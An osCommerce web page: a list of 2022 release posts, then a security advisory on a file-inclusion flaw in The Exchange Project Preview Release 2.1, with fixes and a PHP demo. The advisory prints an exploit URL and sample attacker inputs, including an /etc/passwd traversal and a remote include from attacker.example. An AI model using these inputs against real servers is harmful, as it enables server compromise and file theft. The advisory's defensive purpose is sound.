osCommerce News
Recent posts
osCommerce 4.05 release
September 21, 2022
osCommerce 4.05 has been released! Read more to find out how to upgrade to the latest version and what has changed ...
Hybrid Ecommerce
August 16, 2022
osCommerce brings a new type of Ecommerce platform to the market - a so-called Hybrid Ecommerce. So what is Hybrid Ecommerce? We see it as the best of both worlds - an open source (and free) Ecommerce solution that is also hosted as if it were SaaS (or EaaS - Ecommerce as a Service). This means users (businesses and developers) do not need to worry about hosting requirements and at the same time have full access to the source code and can change or implement any custom features, integrations, etc. Of course, it is always possible to host osCommerce on your own server! It is just so much easier (and quite likely more cost effective!) to use osCommerce's own hosting solutions.

Hybrid Ecommerce from osCommerce

Users can choose to have osCommerce installed for free on one of our servers to try osCommerce before use. Once satisfied with its features, speed and robustness, they can choose to move to a paid osCommerce hosting account or to download osCommerce and run the site on their own server. Moving to an osCommerce-managed server is done automatically. The server environment is optimised for osCommerce, giving the best performance. It is also managed and upgraded with the latest server software. Most importantly, the osCommerce installation can be automatically updated to the latest version of osCommerce (and Applications) as well. Any customisations, done right, will stay, but all the standard modules and the core of osCommerce will be regularly updated, bringing fixes, changes and new features. Full FTP and MySQL access are offered to businesses and developers should they require them. ...
osCommerce 4.03 release
August 16, 2022
osCommerce 4.03 has been released. Read more about what's new in the latest version of the popular free open source shopping cart! ...
osCommerce 4.02 release
August 09, 2022
osCommerce 4.02 release, update notes, download instructions ...
osCommerce 4.01 release
August 04, 2022
osCommerce 4.01 is available from https://www.oscommerce.com and the list of changes is on the osCommerce Wiki: https://wiki.oscommerce.com/index.php?title=Change_Log

We will continue working on fixing issues and adding features; osCommerce will be regularly developed and updated. ...
osCommerce 4.0 Interview
August 03, 2022
What is osCommerce 4.0? How and why was it created? Who is the team behind osCommerce? How was osCommerce released during the war in Ukraine? All of this and more in the video interview by David Goodale of Merchant Accounts (Canada). Visit Merchant Accounts Canada for the full video and transcript ...
osCommerce proudly developed in the UK and Ukraine
July 27, 2022
As many readers would know, osCommerce is headquartered in the UK, but the majority of our team members are in Ukraine. The same was true for Magento, by the way, and for many other amazing technological solutions. What many readers perhaps do not realise is that osCommerce continues to be developed while the war is raging in Ukraine. For example, the final touches to version 4 were made in the evening, while air raid sirens were wailing in many locations in Ukraine where our colleagues are located. We would like to once again express our appreciation and applaud the strong spirit of our colleagues who managed to complete their task (be it with a delay) and release osCommerce 4.0: those men and women who continue to work hard on adding more features, enabling the App Shop, and fixing the teething problems that users of osCommerce report to us. We are working hard to release more features and solutions, and will be updating you in due course! ...
osCommerce v4 release
July 25, 2022
osCommerce 4 released today ...
osCommerce Roadmap
July 25, 2022
Read more about osCommerce Roadmap ...
osCommerce is dead... Long live osCommerce!
July 25, 2022
How osCommerce started, became extremely popular, went into decline and almost died... and was reborn and is being launched today on the road to success! ...

Security Fix For The Exchange Project Preview Release 2.1

Overview
Example
Solution
Notes
Links

Overview

The Exchange Project Preview Release 2.1 [released March 2001] contains a file inclusion vulnerability that can be exploited through PHP's global variable scope: with register_globals enabled (the default before PHP 4.2), PHP imports request parameters as ordinary global variables.

The security issue concerns the following files:

catalog/includes/include_once.php
admin/includes/include_once.php

The cause of the security issue is the $include_file variable, which both scripts pass straight to include().

When include_once.php is pulled in by another script, that script sets $include_file first. If either file is requested directly by a client, nothing initialises $include_file in the local scope; with register_globals enabled, PHP then falls back to a value supplied in the GET, POST or COOKIE data, so the client chooses what gets included.

Example

An example of how the security issue can be exploited via the GET variable scope:

https://server/catalog/includes/include_once.php?include_file=application_top.php

$include_file is now initialised from the query string, so include_once.php performs the following action:

include('application_top.php');

The file 'application_top.php' is included and whatever it outputs is returned to the client.

'application_top.php' is a harmless demonstration. The value reaches include() unchanged, so it can instead name any file readable by the web server (using '..' to traverse out of the includes directory) or, where the PHP configuration permits URLs in include() (allow_url_fopen on PHP 4; allow_url_include since PHP 5.2), a URL to attacker-hosted PHP code, which the server then executes. Either variant can compromise the server.

Solution

This security issue was fixed in the CVS repository (which contains the development sources for the next project version) one week after Preview Release 2.1 was released, by adding a .htaccess file to the following directories:

catalog/includes/
admin/includes/

The latest version of the .htaccess file can be downloaded from the CVS repository:

https://cvs.sf.net/cgi-bin/viewcvs.cgi/tep/catalog/catalog/includes/.htaccess

The .htaccess file works only with Apache web servers, and only where the server configuration lets .htaccess files override access control (the directive class the file uses must be enabled by AllowOverride: Limit for Order/Deny, AuthConfig for Apache 2.4's Require, or All). It blocks direct HTTP requests to the 'includes' directory, which removes the vector entirely: PHP's own include() calls read the files from disk and are unaffected by the rule. If the override is not permitted, Apache silently ignores the file, so verify the fix by requesting catalog/includes/include_once.php and confirming a 403 response.
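The repository's .htaccess is not reproduced on this page. The following is an added example of a catalog/includes/.htaccess that achieves the described effect, not the osCommerce file itself; it assumes the Apache 2.2 and 2.4 directive forms shown, selected by testing for mod_authz_core, which exists only on 2.4:

```apache
# Added example, not the osCommerce CVS file. Denies every direct HTTP
# request for a file in this directory; PHP's include() from disk is
# unaffected. Place in catalog/includes/ and admin/includes/.

# Apache 2.2: needs "AllowOverride Limit" (or All) for this directory.
<IfModule !mod_authz_core.c>
  Order Deny,Allow
  Deny from all
</IfModule>

# Apache 2.4: needs "AllowOverride AuthConfig" (or All) for this directory.
<IfModule mod_authz_core.c>
  Require all denied
</IfModule>
```

After deploying, a request such as `curl -sI https://server/catalog/includes/include_once.php` should return 403; a 200 means AllowOverride is not permitting the file and the directory is still exposed.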

For other web servers, and as defence in depth on Apache, the include_once.php file should be replaced with the following:

<?php
  // Sanitise the requested path: drop traversal sequences, the '@' used in
  // user@host URLs, and ':' so that no scheme (http://, ftp://) survives.
  if (strstr($include_file, '..'))
    $include_file = str_replace('..', '', $include_file);

  if (strstr($include_file, '@'))
    $include_file = str_replace('@', '', $include_file);

  if (strstr($include_file, ':'))
    $include_file = str_replace(':', '', $include_file);

  // Include only when all of the following hold:
  //  - $include_file was set by a calling script;
  //  - DIR_WS_INCLUDES is defined, which only a normally bootstrapped page
  //    does, so a direct request to this file fails here;
  //  - the file has not been included before (the '__' constant emulates
  //    include_once);
  //  - the file exists locally;
  //  - no request source carries an 'include_file' entry, so the value cannot
  //    have come from register_globals. These are the PHP 4 names of today's
  //    $_GET, $_POST, $_COOKIE, $_SESSION, $_FILES and $_ENV.
  if (isset($include_file) &&
      defined('DIR_WS_INCLUDES') &&
     !defined($include_file . '__') &&
      file_exists($include_file) &&
     !isset($HTTP_GET_VARS['include_file']) &&
     !isset($HTTP_POST_VARS['include_file']) &&
     !isset($HTTP_COOKIE_VARS['include_file']) &&
     !isset($HTTP_SESSION_VARS['include_file']) &&
     !isset($HTTP_POST_FILES['include_file']) &&
     !isset($HTTP_ENV_VARS['include_file'])) {

    define($include_file . '__', 1);
    include($include_file);
  }
?>
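register_globals was removed in PHP 5.4, but the bug class described in the Example section, and the allowlist approach that replaces the string-stripping above, can still be demonstrated today. The following is an added example written for this page, not osCommerce code: it emulates the request-to-variable merge with extract() (which is how the same flaw reappears in modern PHP), and the function names, the constructed request arrays, the throwaway includes directory and the allowlisted filenames are all assumptions made for the demonstration. Nothing is actually included; each resolver only returns the path it would have handed to include().

```php
<?php
declare(strict_types=1);
// Added example, not osCommerce code. register_globals is gone since PHP 5.4,
// so the request-to-variable merge that created $include_file is emulated
// with extract(). Each resolver returns the path it would pass to include()
// instead of including it. Run with: php include_file_demo.php

// Constructed attacker inputs (assumption: a query string the client controls).
$sample_requests = [
    ['include_file' => 'application_top.php'],            // the advisory's example
    ['include_file' => '../../../../etc/passwd'],         // local file disclosure
    ['include_file' => 'http://attacker.example/s.txt'],  // remote include
    [],                                                   // nothing supplied
];

// Vulnerable pattern: the request decides the include target, exactly as
// register_globals did for the original $include_file.
function vulnerable_target(array $get): ?string
{
    extract($get);                        // creates $include_file if sent
    if (!isset($include_file)) {
        return null;
    }
    // The original then ran: include($include_file);
    return $include_file;
}

// Hardened pattern: the client-supplied value may only select a name from a
// fixed list of filenames; realpath() plus a prefix check then pins the
// result inside the includes directory, so no traversal, scheme or symlink
// can escape it. A real loader should additionally refuse to run at all when
// requested directly (the advisory's fix does that by testing for a constant
// that only a bootstrapped page defines).
function hardened_target(string $includes_dir, array $allowed, ?string $name): ?string
{
    if ($name === null || !in_array($name, $allowed, true)) {
        return null;                      // not on the list: refuse, no fallback
    }
    $base = realpath($includes_dir);
    $path = realpath($includes_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;                      // directory or file missing
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                      // resolved outside the directory
    }
    return $path;
}

// Throwaway includes directory (assumption) so the demo runs anywhere.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'application_top.php', "<?php\n");
$allowed = ['application_top.php', 'header.php'];   // assumed allowlist

foreach ($sample_requests as $get) {
    $raw = $get['include_file'] ?? null;
    printf("%-38s vulnerable: %-38s hardened: %s\n",
        var_export($raw, true),
        var_export(vulnerable_target($get), true),
        var_export(hardened_target($dir, $allowed, $raw), true));
}

unlink($dir . DIRECTORY_SEPARATOR . 'application_top.php');
rmdir($dir);
```

The vulnerable resolver hands back every attacker string unchanged, including the traversal and URL forms that the advisory's fix strips; the hardened resolver returns a path only for the allowlisted, existing file and returns null for everything else rather than attempting any cleanup of the input.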


Notes

This security issue does not affect versions after Preview Release 2.1; the current development version, osCommerce 2.2-CVS, no longer uses include_once.php. The next stable release, osCommerce 2.2, will be the first [non preview-release] stable release the project has made, with a focus on security, stability, compatibility and performance.

Links

This security issue was forwarded to the Bugtraq security mailing list; the post can be read at:

https://msgs.securepoint.com/cgi-bin/get/bugtraq0206/141.html

A study of common PHP exploitations can be read at:

/

The osCommerce support site is located at:

https://www.oscommerce.com